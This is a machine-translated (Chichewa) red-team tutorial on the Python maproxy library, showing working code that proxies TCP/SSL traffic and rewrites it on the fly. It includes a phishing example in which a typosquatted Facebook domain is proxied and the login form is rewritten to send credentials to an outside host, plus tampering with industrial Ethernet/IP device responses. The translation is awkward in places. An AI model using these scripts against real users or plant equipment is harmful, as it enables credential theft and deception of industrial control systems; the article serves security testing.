Kumasulira kwa nkhaniyi kunakonzedwa madzulo a chiyambi cha maphunziro .
Kuzindikira
Mitundu yosiyanasiyana yowunika zachitetezo, kuyambira pakuyesa kulowa pafupipafupi komanso magwiridwe antchito a Red Team mpaka kuwononga zida za IoT/ICS ndi SCADA, kumaphatikizapo kugwira ntchito ndi ma protocol a binary network, ndiko kuti, kulowetsa ndikusintha data ya netiweki pakati pa kasitomala ndi chandamale. Kuwombera pamaneti si ntchito yovuta popeza tili ndi zida monga Wireshark, Tcpdump kapena Scapy, koma kusinthidwa kumawoneka ngati ntchito yovuta kwambiri chifukwa tidzafunika kukhala ndi mawonekedwe amtundu wina kuti tiwerenge ma network, kusefa, kusintha. ikani pa ntchentche ndikuitumizanso kwa omwe akumufunayo pafupifupi nthawi yeniyeni. Kuonjezera apo, zingakhale bwino ngati chida choterocho chingathe kugwira ntchito ndi maulumikizi angapo ofanana ndikukhala osinthika pogwiritsa ntchito malemba.
Tsiku lina ndinapeza chida chotchedwa , zolembedwazo mwamsanga zinandimveketsa bwino kuti maproxy - zomwe ndikusowa. Iyi ndi projekiti ya TCP yosavuta, yosunthika komanso yosinthika mosavuta. Ndidayesa chida ichi pamapulogalamu angapo ovuta, kuphatikiza zida za ICS (zomwe zimapanga mapaketi ambiri) kuti ndiwone ngati zitha kuthana ndi maulumikizidwe ambiri ofanana, ndipo chidacho chidachita bwino.
Nkhaniyi ikuwonetsani momwe mungasinthire data ya netiweki pa ntchentche pogwiritsa ntchito maproxy.
mwachidule
Chida maproxy idakhazikitsidwa pa Tornado, njira yotchuka komanso yokhwima yolumikizana ndi intaneti ku Python.
Kawirikawiri, imatha kugwira ntchito m'njira zingapo:
TCP:TCP- kulumikizana kwa TCP kosasinthika;TCP:SSLΠΈSSL:TCP- ndi njira imodzi kubisa;SSL:SSL- njira ziwiri kubisa.
Imabwera ngati laibulale. Poyambira mwachangu, mutha kugwiritsa ntchito mafayilo achitsanzo omwe amawonetsa zazikulu :
all.pycertificate.pemlogging_proxy.pyprivatekey.pemssl2ssl.pyssl2tcp.pytcp2ssl.pytcp2tcp.py
Mlandu 1 - proxy yosavuta yolumikizirana
Kutengera tcp2tcp.py:
#!/usr/bin/env python
import tornado.ioloop
import maproxy.proxyserver
server = maproxy.proxyserver.ProxyServer("localhost",22)
server.listen(2222)
tornado.ioloop.IOLoop.instance().start()
zotsatira ProxyServer() zimatenga mfundo ziwiri - malo olumikizirana ndi doko lomwe mukufuna. server.listen() zimatenga mkangano umodzi - doko lomvera kulumikizana komwe kukubwera.
Kukonzekera script:
# python tcp2tcp.py
Kuti tiyese kuyesa, tilumikiza ku seva yapafupi ya SSH kudzera mu proxy script, yomwe imamvetsera. 2222/tcp doko ndikulumikizana ndi doko lokhazikika 22/tcp Ma seva a SSH:
Chikwangwani cholandirira chimakudziwitsani kuti script yathu yachitsanzo yathandizira bwino kuchuluka kwa anthu pa intaneti.
Mlandu 2 - kusintha kwa data
Demo linanso script logging_proxy.py yabwino yolumikizana ndi data ya netiweki. Ndemanga zomwe zili mufayilo zikufotokoza njira zamakalasi zomwe mungasinthe kuti mukwaniritse cholinga chanu:
Chosangalatsa kwambiri ndi ichi:
on_c2p_done_read- kusokoneza deta panjira kuchokera kwa kasitomala kupita ku seva;on_p2s_done_read- kusinthidwa.
Tiyeni tiyese kusintha chikwangwani cha SSH chomwe seva imabwerera kwa kasitomala:
[β¦]
def on_p2s_done_read(self,data):
data = data.replace("OpenSSH", "DumnySSH")
super(LoggingSession,self).on_p2s_done_read(data)
[β¦]
server = maproxy.proxyserver.ProxyServer("localhost",22)
server.listen(2222)
[β¦]Pangani script:
Monga mukuwonera, kasitomala adasokeretsedwa chifukwa dzina la seva la SSH lasinthidwa kukhala Β«DumnySSHΒ».
Mlandu 3 - tsamba losavuta lachinyengo
Pali njira zopanda malire zogwiritsira ntchito chida ichi. Nthawi ino tiyeni tiyang'ane china chake chothandiza kwambiri kuchokera ku mbali ya Red Team. Tiyeni titsanzire tsamba lofikira m.facebook.com ndikugwiritsa ntchito domeni yomwe mwaikonda molemba mwadala, mwachitsanzo, m.facebok.com. Pazifukwa zowonetsera, tiyeni tingoganiza kuti domain idalembetsedwa ndi ife.
Tikhazikitsa kulumikizana kwa netiweki kosalembetsedwa ndi olandila athu omwe akhudzidwa ndi SSL Stream ku seva ya Facebook (31.13.81.36). Kuti chitsanzochi chigwire ntchito, tifunika kusintha mutu wa HTTP wolandila ndikuyika dzina loyenera, ndipo tidzaletsanso kuponderezana kwa mayankho kuti titha kupeza zomwe zilimo mosavuta. Pamapeto pake tidzasintha mawonekedwe a HTML kuti zidziwitso zolowera zitumizidwe kwa ife m'malo mwa ma seva a Facebook:
[β¦]
def on_c2p_done_read(self,data):
# replace Host header
data = data.replace("Host: m.facebok.com", "Host: m.facebook.com")
# disable compression
data = data.replace("gzip", "identity;q=0")
data = data.replace("deflate", "")
super(LoggingSession,self).on_c2p_done_read(data)
[β¦]
def on_p2s_done_read(self,data):
# partial replacement of response
data = data.replace("action="/ny/login/", "action="https://redteam.pl/")
super(LoggingSession,self).on_p2s_done_read(data)
[β¦]
server = maproxy.proxyserver.ProxyServer("31.13.81.36",443, session_factory=LoggingSessionFactory(), server_ssl_options=True)
server.listen(80)
[β¦]Mwachidule:
Monga mukuonera, tinakwanitsa kusintha malo oyambirira.
Mlandu 4 - Porting Ethernet/IP
Ndakhala ndikugwira ntchito ndi zida zamafakitale ndi mapulogalamu (ICS/SCADA) kwa nthawi yayitali, monga owongolera osinthika (PLC), ma module a I/O, ma drive, ma relay, malo opangira makwerero ndi zina zambiri. Mlanduwu ndi wa omwe amakonda zinthu zamakampani. Kubera mayankho otere kumaphatikizapo kusewera mwachangu ndi ma protocol apaintaneti. Muchitsanzo chotsatirachi, ndikufuna kusonyeza momwe mungasinthire ICS/SCADA network traffic.
Kwa ichi mudzafunika zotsatirazi:
- Network sniffer, mwachitsanzo, Wireshark;
- Efaneti / IP kapena chipangizo cha SIP chokha, mutha kuchipeza pogwiritsa ntchito ntchito ya Shodan;
- Zolemba zathu zachokera
maproxy.
Choyamba, tiyeni tiwone momwe chizindikiritso chochokera ku CIP (Common Industrial Protocol) chimawonekera:
Chidziwitso cha chipangizo chimakwaniritsidwa pogwiritsa ntchito protocol ya Ethernet/IP, yomwe ndi mtundu wowongoleredwa wa protocol ya Ethernet yamakampani yomwe imakulunga ma protocol monga CIP. Tikusintha dzina la ID lomwe likuwonekera pazithunzi "NI-IndComm ya Efaneti" pogwiritsa ntchito proxy script yathu. Titha kugwiritsanso ntchito script logging_proxy.py ndi chimodzimodzi kusintha kalasi njira on_p2s_done_read, chifukwa tikufuna kuti dzina lina liwonekere pa kasitomala.
Code:
[β¦]
def on_p2s_done_read(self,data):
# partial replacement of response
# Checking if we got List Identity message response
if data[26:28] == b'x0cx00':
print('Got response, replacing')
data = data[:63] + 'DUMMY31337'.encode('utf-8') + data[63+10:]
super(LoggingSession,self).on_p2s_done_read(data)
[β¦]
server = maproxy.proxyserver.ProxyServer("1.3.3.7",44818,session_factory=LoggingSessionFactory())
server.listen(44818)
[β¦]
Kwenikweni, tidapempha chizindikiritso cha chipangizo kawiri, yankho lachiwiri linali loyambirira, ndipo loyamba lidasinthidwa ndikuwuluka.
Ndipo otsiriza
M'malingaliro anga maproxy Chida chosavuta komanso chosavuta, chomwe chimalembedwanso ku Python, kotero ndikukhulupirira kuti inunso mungapindule pochigwiritsa ntchito. Zoonadi, pali zida zovuta kwambiri zogwirira ntchito ndikusintha deta ya intaneti, koma zimafunanso chidwi kwambiri ndipo nthawi zambiri zimapangidwira kuti zigwiritsidwe ntchito, mwachitsanzo. , kapena pamilandu yofanana ndi yachitatu, kapena kwa mlandu womaliza. Njira imodzi kapena ina, ndi chithandizo maproxy mutha kugwiritsa ntchito mwachangu malingaliro anu kuti muchepetse deta yapaintaneti, popeza zolemba zachitsanzo zimamveka bwino.
Source: www.habr.com